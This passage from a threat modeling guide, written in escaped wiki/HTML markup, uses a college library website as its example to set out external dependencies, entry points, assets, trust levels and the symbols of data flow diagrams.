&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;External Dependencies&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website will run on a Linux server running Apache.  This server will be hardened as per the college's server hardening standard. This includes the application of the latest operating system and application security patches.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database server will be MySQL and it will run on a Linux server. This server will be hardened as per the college's server hardening standard. This will include the application of the lastest operating system and application security patches.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The connection between the Web Server and the database server will be over a private network.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The Web Server is behind a firewall and the only communication available is TLS.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Entry Points==&lt;br /&gt;
Entry points define the interfaces through which potential attackers can interact with the application or supply it with data. In order for a potential attacker to attack an application, entry points must exist. Entry points in an application can be layered, for example each web page in a web application may contain multiple entry points. Entry points should be documented as follows: &lt;br /&gt;
&lt;br /&gt;
#  '''ID''' - A unique ID assigned to the entry point. This will be used to cross reference the entry point with any threats or vulnerabilities that are identified. In the case of layer entry points, a major.minor notation should be used.&lt;br /&gt;
# '''Name''' - A descriptive name identifying the entry point and its purpose.&lt;br /&gt;
# '''Description''' - A textual description detailing the interaction or processing that occurs at the entry point.&lt;br /&gt;
# '''Trust Levels''' - The level of access required at the entry point is documented here. These will be cross referenced with the trusts levels defined later in the document.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Entry Points&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;15%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;45%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;HTTPS Port&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website will be only be accessable via TLS. All pages within the college library website are layered on this entry point.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Library Main Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The splash page for the college library website is the entry point for all users.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Students, faculty members and librarians must log in to the college library website before they can carry out any of the use cases.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;(1) Anonymous Web User&amp;lt;br/&amp;gt;&lt;br /&gt;
(2) User with Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Function&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login function accepts user supplied credentials and compares them with those in the database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(3) User with Invalid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Search Entry Page&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The page used to enter  a search query.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Assets==&lt;br /&gt;
The system must have something that the attacker is interested in; these items/areas of interest are defined as assets. Assets are essentially threat targets, i.e. they are the reason threats will exist. Assets can be both physical assets and abstract assets. For example, an asset of an application might be a list of clients and their personal information; this is a physical asset. An abstract asset might be the reputation of an organsation. Assets are documented in the threat model as follows: &lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique ID is assigned to identify each asset. This will be used to cross reference the asset with any threats or vulnerabilities that are identified.&lt;br /&gt;
# '''Name''' - A descriptive name that clearly identifies the asset.&lt;br /&gt;
# '''Description''' - A textual description of what the asset is and why it needs to be protected.&lt;br /&gt;
# '''Trust Levels''' - The level of access required to access the entry point is documented here. These will be cross referenced with the trust levels defined in the next step.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Assets&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;15%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;55%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Library Users and Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to students, faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User Login Details&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login credentials that a student or a faculty member will use to log into the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Librarian Login Details&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The login credentials that a Librarian will use to log into the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Personal Data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The College Library website will store personal information relating to the students, faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian &amp;lt;br/&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;System&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to the underlying system.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Availability of College Library Website&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The College Library website should be available 24 hours a day and can be accessed by all students, college faculty members, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute Code as a Web Server User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the ability to execute source code on the web server as a web server user.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(6) Website Administrator &amp;lt;br/&amp;gt;&lt;br /&gt;
(7) Web Server User Process &amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute SQL as a Database Read User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the ability to execute SQL select queries on the database, and thus retrieve any information stored within the College Library database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
(8) Database Read User&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2.4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Execute SQL as a Database Read/Write User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the ability to execute SQL. Select, insert, and update queries on the database and thus have read and write access to any information stored within the College Library database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
(9) Database Read/Write User&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Website&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Assets relating to the College Library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Login Session&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the login session of a user to the College Library website. This user could be a student, a member of the college faculty, or a Librarian.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(2) User with Valid Login Credentials&amp;lt;br/&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to the Database Server&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to the database server allows you to administer the database, giving you full access to the database users and all data contained within the database.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(5) Database Server Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Ability to Create Users&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The ability to create users would allow an individual to create new users on the system. These could be student users, faculty member users, and librarian users.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(4) Librarian&amp;lt;br/&amp;gt;&lt;br /&gt;
(6) Website Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3.3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Access to Audit Data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The audit data shows all audit-able events that occurred within the College Library application by students, staff, and librarians.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
(6) Website Administrator&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Trust Levels==&lt;br /&gt;
Trust levels represent the access rights that the application will grant to external entities. The trust levels are cross referenced with the entry points and assets. This allows us to define the access rights or privileges required at each entry point, and those required to interact with each asset. Trust levels are documented in the threat model as follows: &lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique number is assigned to each trust level. This is used to cross reference the trust level with the entry points and assets.&lt;br /&gt;
# '''Name''' - A descriptive name that allows you to identify the external entities that have been granted this trust level.&lt;br /&gt;
# '''Description''' - A textual description of the trust level detailing the external entity who has been granted the trust level.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Trust Levels&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;5%&amp;quot;&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;25%&amp;quot;&amp;gt;Name&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th width=&amp;quot;70%&amp;quot;&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Anonymous Web User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website but has not provided valid credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User with Valid Login Credentials&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website and has logged in using valid login credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User with Invalid Login Credentials&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;A user who has connected to the college library website and is attempting to log in using invalid login credentials.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Librarian&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The librarian can create users on the library website and view their personal information.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;5&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Server Administrator&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database server administrator has read and write access to the database that is used by the college library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Website Administrator&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The Website administrator can configure the college library website.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;7&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Web Server User Process&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;This is the process/user that the web server executes code as and authenticates itself against the database server as.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;8&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Read User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database user account used to access the database for read access.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;9&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Database Read/Write User&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database user account used to access the database for read and write access.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Data Flow Diagrams==&lt;br /&gt;
All of the information collected allows us to accurately model the application through the use of Data Flow Diagrams (DFDs). The DFDs will allow us to gain a better understanding of the application by providing a visual representation of how the application processes data. The focus of the DFDs is on how data moves through the application and what happens to the data as it moves. DFDs are hierarchical in structure, so they can be used to decompose the application into subsystems and lower-level subsystems. The high level DFD will allow us to clarify the scope of the application being modeled. The lower level iterations will allow us to focus on the specific processes involved when processing specific data. There are a number of symbols that are used in DFDs for threat modeling. These are described below:&lt;br /&gt;
&lt;br /&gt;
'''External Entity'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The external entity shape is used to represent any entity outside the application that interacts with the application via an entry point.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_external_entity.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Process'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The process shape represents a task that handles data within the application. The task may process the data or perform an action based on the data.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_process.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Multiple Process'''&amp;lt;br/&amp;gt;&lt;br /&gt;
The multiple process shape is used to present a collection of subprocesses. The multiple process can be broken down into its subprocesses in another DFD.&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Image:DFD_multiple_process.gif]]&lt;br /&gt;
&amp;lt;br/&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
